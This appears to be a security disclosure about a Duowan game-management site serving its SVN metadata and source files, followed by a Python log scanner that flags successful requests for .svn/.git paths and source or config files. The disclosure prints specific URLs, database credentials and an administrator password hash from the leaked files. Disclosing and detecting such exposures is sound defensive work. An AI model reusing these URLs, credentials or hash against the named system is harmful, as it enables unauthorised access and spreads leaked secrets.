Sensitive information leak in a Duowan GM (game management) system
First, the SVN leak:
http://qa.tank.duowan.com/manage/.svn/entries
The exposed SVN metadata did not allow retrieving the files themselves, but it revealed the rough directory layout; requesting those paths directly then exposed the source code, for example http://qa.tank.duowan.com/manage/sql/dbcfg.py
HOST = '127.0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'update'
BUILDSQL = 'table_defines.sql'
UPDATELOG = 'update.ini'
UPDATETABLE = '_db_update_log'
BUILDUPDATESQL = '_db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'
Proof of vulnerability:
http://qa.tank.duowan.com/manage/sql/table_defines.sql
INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES
(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);
http://qa.tank.duowan.com/manage/i18n/config.sh
ROOT_PATH=/var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList.php`);
LEN_OF_LANG_LIST=${#LANG_LIST[@]}
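As an added defensive example (not part of the original report), a small Python detector run over constructed web-server access-log lines: it flags successful responses to requests for version-control metadata or raw source/config files under the web root, which is the exposure pattern this report describes. The IPs, timestamps and log lines are constructed samples.

```python
import re
from urllib.parse import urlparse

# Constructed sample access-log lines in combined format (not from the report).
SAMPLE_LOG = """\
1.2.3.4 - - [10/Jun/2012:12:00:01 +0800] "GET /manage/.svn/entries HTTP/1.1" 200 1843 "-" "curl/7.21"
1.2.3.4 - - [10/Jun/2012:12:00:05 +0800] "GET /manage/sql/dbcfg.py HTTP/1.1" 200 312 "-" "curl/7.21"
1.2.3.4 - - [10/Jun/2012:12:00:09 +0800] "GET /manage/sql/table_defines.sql HTTP/1.1" 200 9012 "-" "curl/7.21"
1.2.3.4 - - [10/Jun/2012:12:00:12 +0800] "GET /manage/i18n/config.sh HTTP/1.1" 200 210 "-" "curl/7.21"
5.6.7.8 - - [10/Jun/2012:12:01:00 +0800] "GET /manage/index.php HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
5.6.7.8 - - [10/Jun/2012:12:01:03 +0800] "GET /manage/.svn/entries HTTP/1.1" 404 169 "-" "Mozilla/5.0"
"""

# Minimal parser for the common/combined log format: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Version-control metadata directories and raw source/config extensions that
# should never be reachable from a web root (dbcfg.py, table_defines.sql,
# config.sh and update.ini are the kinds of files named in the report).
VCS_DIRS = ("/.svn/", "/.git/", "/.hg/")
SOURCE_EXT = (".py", ".sql", ".sh", ".ini", ".bak", ".inc")

def classify(path):
    """Return a reason if the path is a VCS-metadata or source/config request, else None."""
    p = urlparse(path).path.lower()
    if any(d in p for d in VCS_DIRS):
        return "vcs-metadata"
    if p.endswith(SOURCE_EXT):
        return "source-or-config"
    return None

def find_exposures(log_text):
    """Return (ip, path, reason) for every 2xx response to a sensitive path.
    Non-2xx hits (e.g. 404) are probes that did not disclose anything and are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m.group("path"))
        if reason and m.group("status").startswith("2"):
            hits.append((m.group("ip"), m.group("path"), reason))
    return hits

if __name__ == "__main__":
    for ip, path, reason in find_exposures(SAMPLE_LOG):
        print(f"{ip} fetched {path} ({reason})")
```

Any 2xx hit reported here means the web server is serving files that should be blocked at the server level (deny `.svn`/`.git` directories and keep deployment scripts and SQL dumps outside the document root).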